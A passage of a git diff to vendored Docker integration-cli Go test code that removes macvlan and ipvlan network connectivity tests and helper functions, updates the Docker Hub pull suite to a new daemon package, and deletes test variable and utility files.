-	// Inspect and store the v4 address from specified container on the network dualstackl2
-	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackl2
-	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// Inspect the v4 gateway to ensure the proper default GW was assigned
-	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway")
-	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1")
-	// Inspect the v6 gateway to ensure the proper default GW was assigned
-	ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway")
-	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1")
-
-	// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
-	ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway")
-	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254")
-	// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
-	ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway")
-	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) {
-	// create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode
-	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254",
-		"--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3")
-	// Ensure the network was created
-	assertNwIsAvailable(c, "dualstackl3")
-
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top")
-
-	// Inspect and store the v4 address from specified container on the network dualstackl3
-	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackl3
-	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address second to first
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address second to first
-	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top")
-
-	// Inspect and store the v4 address from specified container on the network dualstackl3
-	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackl3
-	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// Inspect and store the v4 address from specified container on the network dualstackl3
-	ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackl3
-	ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
-
-	// Verify connectivity across disparate subnets which is unique to L3 mode only
-	_, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	_, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// Inspect the v4 gateway to ensure no next hop is assigned in L3 mode
-	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway")
-	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "")
-	// Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled
-	ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway")
-	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) {
-	// Ensure the default gateways, next-hops and default dev devices are properly set
-	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24",
-		"--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge")
-	assertNwIsAvailable(c, "dualstackbridge")
-	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top")
-	// Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet
-	out, _, err := dockerCmdWithError("exec", "first", "ip", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0")
-	// Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop
-	out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0")
-
-	// Verify ipvlan l2 mode sets the proper default gateway routes via netlink
-	// for either an explicitly set route by the user or inferred via default IPAM
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254",
-		"--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2")
-	assertNwIsAvailable(c, "dualstackl2")
-	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "busybox", "top")
-	// Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet
-	out, _, err = dockerCmdWithError("exec", "second", "ip", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0")
-	// Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop
-	out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0")
-
-	// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254",
-		"--subnet=2001:db8:abcd::/64", "--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3")
-	assertNwIsAvailable(c, "dualstackl3")
-	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top")
-	// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
-	out, _, err = dockerCmdWithError("exec", "third", "ip", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default dev eth0")
-	// Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops
-	out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route")
-	c.Assert(err, check.IsNil)
-	c.Assert(out, checker.Contains, "default dev eth0")
-}
-
-func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) {
-	// macvlan bridge mode - dummy parent interface is provisioned dynamically
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent")
-	assertNwIsAvailable(c, "dm-nil-parent")
-
-	// start two containers on the same subnet
-	dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) {
-	// macvlan bridge mode --internal containers can communicate inside the network but not externally
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal")
-	assertNwIsAvailable(c, "dm-internal")
-	nr := getNetworkResource(c, "dm-internal")
-	c.Assert(nr.Internal, checker.True)
-
-	// start two containers on the same subnet
-	dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// access outside of the network should fail
-	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
-	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
-
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) {
-	// ipvlan l2 mode - dummy parent interface is provisioned dynamically
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent")
-	assertNwIsAvailable(c, "di-nil-parent")
-
-	// start two containers on the same subnet
-	dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) {
-	// ipvlan l2 mode --internal containers can communicate inside the network but not externally
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal")
-	assertNwIsAvailable(c, "di-internal")
-	nr := getNetworkResource(c, "di-internal")
-	c.Assert(nr.Internal, checker.True)
-
-	// start two containers on the same subnet
-	dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// access outside of the network should fail
-	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
-	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) {
-	// ipvlan l3 mode - dummy parent interface is provisioned dynamically
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24",
-		"--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3")
-	assertNwIsAvailable(c, "di-nil-parent-l3")
-
-	// start two containers on separate subnets
-	dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) {
-	// ipvlan l3 mode --internal containers can communicate inside the network but not externally
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24",
-		"--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3")
-	assertNwIsAvailable(c, "di-internal-l3")
-	nr := getNetworkResource(c, "di-internal-l3")
-	c.Assert(nr.Internal, checker.True)
-
-	// start two containers on separate subnets
-	dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-
-	// access outside of the network should fail
-	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
-	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
-	// intra-network communications should succeed
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) {
-	// macvlan bridge mode - empty parent interface containers can reach each other internally but not externally
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	netName := "dm-parent-exists"
-	out, err := createMasterDummy(c, "dm-dummy0")
-	//out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network using an existing parent interface
-	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName)
-	assertNwIsAvailable(c, netName)
-	// delete the network while preserving the parent link
-	dockerCmd(c, "network", "rm", netName)
-	assertNwNotAvailable(c, netName)
-	// verify the network delete did not delete the predefined link
-	out, err = linkExists(c, "dm-dummy0")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	deleteInterface(c, "dm-dummy0")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-}
-
-func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) {
-	// macvlan bridge mode -  empty parent interface containers can reach each other internally but not externally
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	netName := "dm-subinterface"
-	out, err := createMasterDummy(c, "dm-dummy0")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network using an existing parent interface
-	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName)
-	assertNwIsAvailable(c, netName)
-
-	// start containers on 802.1q tagged '-o parent' sub-interface
-	dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top")
-	c.Assert(waitRun("first"), check.IsNil)
-	dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top")
-	c.Assert(waitRun("second"), check.IsNil)
-	// verify containers can communicate
-	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
-	c.Assert(err, check.IsNil)
-
-	// remove the containers
-	dockerCmd(c, "rm", "-f", "first")
-	dockerCmd(c, "rm", "-f", "second")
-	// delete the network while preserving the parent link
-	dockerCmd(c, "network", "rm", netName)
-	assertNwNotAvailable(c, netName)
-	// verify the network delete did not delete the predefined sub-interface
-	out, err = linkExists(c, "dm-dummy0.20")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// delete the parent interface which also collects the slave
-	deleteInterface(c, "dm-dummy0")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-}
-
-func createMasterDummy(c *check.C, master string) (string, error) {
-	// ip link add <dummy_name> type dummy
-	args := []string{"link", "add", master, "type", "dummy"}
-	ipLinkCmd := exec.Command("ip", args...)
-	out, _, err := runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-	// ip link set dummy_name up
-	args = []string{"link", "set", master, "up"}
-	ipLinkCmd = exec.Command("ip", args...)
-	out, _, err = runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-	return out, err
-}
-
-func createVlanInterface(c *check.C, master, slave, id string) (string, error) {
-	// ip link add link <master> name <master>.<VID> type vlan id <VID>
-	args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id}
-	ipLinkCmd := exec.Command("ip", args...)
-	out, _, err := runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-	// ip link set <sub_interface_name> up
-	args = []string{"link", "set", slave, "up"}
-	ipLinkCmd = exec.Command("ip", args...)
-	out, _, err = runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-	return out, err
-}
-
-func linkExists(c *check.C, master string) (string, error) {
-	// verify the specified link exists, ip link show <link_name>
-	args := []string{"link", "show", master}
-	ipLinkCmd := exec.Command("ip", args...)
-	out, _, err := runCommandWithOutput(ipLinkCmd)
-	if err != nil {
-		return out, err
-	}
-	return out, err
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
index df52cae1a4..125b8c10aa 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
@@ -5,7 +5,9 @@ import (
 	"runtime"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
 	"github.com/go-check/check"
 )
 
@@ -25,7 +27,7 @@ func init() {
 // relative impact of each individual operation. As part of this suite, all
 // images are removed after each test.
 type DockerHubPullSuite struct {
-	d  *Daemon
+	d  *daemon.Daemon
 	ds *DockerSuite
 }
 
@@ -38,17 +40,15 @@ func newDockerHubPullSuite() *DockerHubPullSuite {
 
 // SetUpSuite starts the suite daemon.
 func (s *DockerHubPullSuite) SetUpSuite(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	s.d = NewDaemon(c)
-	err := s.d.Start()
-	c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err))
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	s.d.Start(c)
 }
 
 // TearDownSuite stops the suite daemon.
 func (s *DockerHubPullSuite) TearDownSuite(c *check.C) {
 	if s.d != nil {
-		err := s.d.Stop()
-		c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err))
+		s.d.Stop(c)
 	}
 }
 
@@ -84,7 +84,7 @@ func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, e
 
 // MakeCmd returns an exec.Cmd command to run against the suite daemon.
 func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd {
-	args := []string{"--host", s.d.sock(), name}
+	args := []string{"--host", s.d.Sock(), name}
 	args = append(args, arg...)
 	return exec.Command(dockerBinary, args...)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
deleted file mode 100644
index 3559bfdbb7..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
+++ /dev/null
@@ -1,165 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"fmt"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"strconv"
-
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/pkg/reexec"
-)
-
-var (
-	// the docker client binary to use
-	dockerBinary = "docker"
-	// the docker daemon binary to use
-	dockerdBinary = "dockerd"
-
-	// path to containerd's ctr binary
-	ctrBinary = "docker-containerd-ctr"
-
-	// the private registry image to use for tests involving the registry
-	registryImageName = "registry"
-
-	// the private registry to use for tests
-	privateRegistryURL = "127.0.0.1:5000"
-
-	// TODO Windows CI. These are incorrect and need fixing into
-	// platform specific pieces.
-	runtimePath = "/var/run/docker"
-
-	workingDirectory string
-
-	// isLocalDaemon is true if the daemon under test is on the same
-	// host as the CLI.
-	isLocalDaemon bool
-
-	// daemonPlatform is held globally so that tests can make intelligent
-	// decisions on how to configure themselves according to the platform
-	// of the daemon. This is initialized in docker_utils by sending
-	// a version call to the daemon and examining the response header.
-	daemonPlatform string
-
-	// windowsDaemonKV is used on Windows to distinguish between different
-	// versions. This is necessary to enable certain tests based on whether
-	// the platform supports it. For example, Windows Server 2016 TP3 did
-	// not support volumes, but TP4 did.
-	windowsDaemonKV int
-
-	// daemonDefaultImage is the name of the default image to use when running
-	// tests. This is platform dependent.
-	daemonDefaultImage string
-
-	// For a local daemon on Linux, these values will be used for testing
-	// user namespace support as the standard graph path(s) will be
-	// appended with the root remapped uid.gid prefix
-	dockerBasePath       string
-	volumesConfigPath    string
-	containerStoragePath string
-
-	// experimentalDaemon tell whether the main daemon has
-	// experimental features enabled or not
-	experimentalDaemon bool
-
-	// daemonStorageDriver is held globally so that tests can know the storage
-	// driver of the daemon. This is initialized in docker_utils by sending
-	// a version call to the daemon and examining the response header.
-	daemonStorageDriver string
-
-	// WindowsBaseImage is the name of the base image for Windows testing
-	// Environment variable WINDOWS_BASE_IMAGE can override this
-	WindowsBaseImage = "microsoft/windowsservercore"
-
-	// isolation is the isolation mode of the daemon under test
-	isolation container.Isolation
-
-	// daemonPid is the pid of the main test daemon
-	daemonPid int
-
-	daemonKernelVersion string
-)
-
-const (
-	// DefaultImage is the name of the base image for the majority of tests that
-	// are run across suites
-	DefaultImage = "busybox"
-)
-
-func init() {
-	reexec.Init()
-	if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" {
-		dockerBinary = dockerBin
-	}
-	var err error
-	dockerBinary, err = exec.LookPath(dockerBinary)
-	if err != nil {
-		fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err)
-		os.Exit(1)
-	}
-	if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" {
-		registryImageName = registryImage
-	}
-	if registry := os.Getenv("REGISTRY_URL"); registry != "" {
-		privateRegistryURL = registry
-	}
-	workingDirectory, _ = os.Getwd()
-
-	// Deterministically working out the environment in which CI is running
-	// to evaluate whether the daemon is local or remote is not possible through
-	// a build tag.
-	//
-	// For example Windows to Linux CI under Jenkins tests the 64-bit
-	// Windows binary build with the daemon build tag, but calls a remote
-	// Linux daemon.
-	//
-	// We can't just say if Windows then assume the daemon is local as at
-	// some point, we will be testing the Windows CLI against a Windows daemon.
-	//
-	// Similarly, it will be perfectly valid to also run CLI tests from
-	// a Linux CLI (built with the daemon tag) against a Windows daemon.
-	if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 {
-		isLocalDaemon = false
-	} else {
-		isLocalDaemon = true
-	}
-
-	// TODO Windows CI. This are incorrect and need fixing into
-	// platform specific pieces.
-	// This is only used for a tests with local daemon true (Linux-only today)
-	// default is "/var/lib/docker", but we'll try and ask the
-	// /info endpoint for the specific root dir
-	dockerBasePath = "/var/lib/docker"
-	type Info struct {
-		DockerRootDir     string
-		ExperimentalBuild bool
-		KernelVersion     string
-	}
-	var i Info
-	status, b, err := sockRequest("GET", "/info", nil)
-	if err == nil && status == 200 {
-		if err = json.Unmarshal(b, &i); err == nil {
-			dockerBasePath = i.DockerRootDir
-			experimentalDaemon = i.ExperimentalBuild
-			daemonKernelVersion = i.KernelVersion
-		}
-	}
-	volumesConfigPath = dockerBasePath + "/volumes"
-	containerStoragePath = dockerBasePath + "/containers"
-
-	if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 {
-		WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE")
-		fmt.Println("INFO: Windows Base image is ", WindowsBaseImage)
-	}
-
-	dest := os.Getenv("DEST")
-	b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid"))
-	if err == nil {
-		if p, err := strconv.ParseInt(string(b), 10, 32); err == nil {
-			daemonPid = int(p)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go
deleted file mode 100644
index 749e4b3357..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_utils.go
+++ /dev/null
@@ -1,1607 +0,0 @@
-package main
-
-import (
-	"bufio"
-	"bytes"
-	"crypto/tls"
-	"encoding/json"
-	"errors"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"net"
-	"net/http"
-	"net/http/httptest"
-	"net/http/httputil"
-	"net/url"
-	"os"
-	"os/exec"
-	"path"
-	"path/filepath"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	volumetypes "github.com/docker/docker/api/types/volume"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/httputils"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/docker/go-connections/tlsconfig"
-	units "github.com/docker/go-units"
-	"github.com/go-check/check"
-)
-
-func init() {
-	cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}")
-	cmd.Env = appendBaseEnv(true)
-	out, err := cmd.CombinedOutput()
-	if err != nil {
-		panic(fmt.Errorf("err=%v\nout=%s\n", err, out))
-	}
-	images := strings.Split(strings.TrimSpace(string(out)), "\n")
-	for _, img := range images {
-		protectedImages[img] = struct{}{}
-	}
-
-	res, body, err := sockRequestRaw("GET", "/info", nil, "application/json")
-	if err != nil {
-		panic(fmt.Errorf("Init failed to get /info: %v", err))
-	}
-	defer body.Close()
-	if res.StatusCode != http.StatusOK {
-		panic(fmt.Errorf("Init failed to get /info. Res=%v", res))
-	}
-
-	svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server"))
-	daemonPlatform = svrHeader.OS
-	if daemonPlatform != "linux" && daemonPlatform != "windows" {
-		panic("Cannot run tests against platform: " + daemonPlatform)
-	}
-
-	// Now we know the daemon platform, can set paths used by tests.
-	var info types.Info
-	err = json.NewDecoder(body).Decode(&info)
-	if err != nil {
-		panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err))
-	}
-
-	daemonStorageDriver = info.Driver
-	dockerBasePath = info.DockerRootDir
-	volumesConfigPath = filepath.Join(dockerBasePath, "volumes")
-	containerStoragePath = filepath.Join(dockerBasePath, "containers")
-	// Make sure in context of daemon, not the local platform. Note we can't
-	// use filepath.FromSlash or ToSlash here as they are a no-op on Unix.
-	if daemonPlatform == "windows" {
-		volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1)
-		containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1)
-		// On Windows, extract out the version as we need to make selective
-		// decisions during integration testing as and when features are implemented.
-		// eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550
-		windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1])
-	} else {
-		volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1)
-		containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1)
-	}
-	isolation = info.Isolation
-}
-
-func convertBasesize(basesizeBytes int64) (int64, error) {
-	basesize := units.HumanSize(float64(basesizeBytes))
-	basesize = strings.Trim(basesize, " ")[:len(basesize)-3]
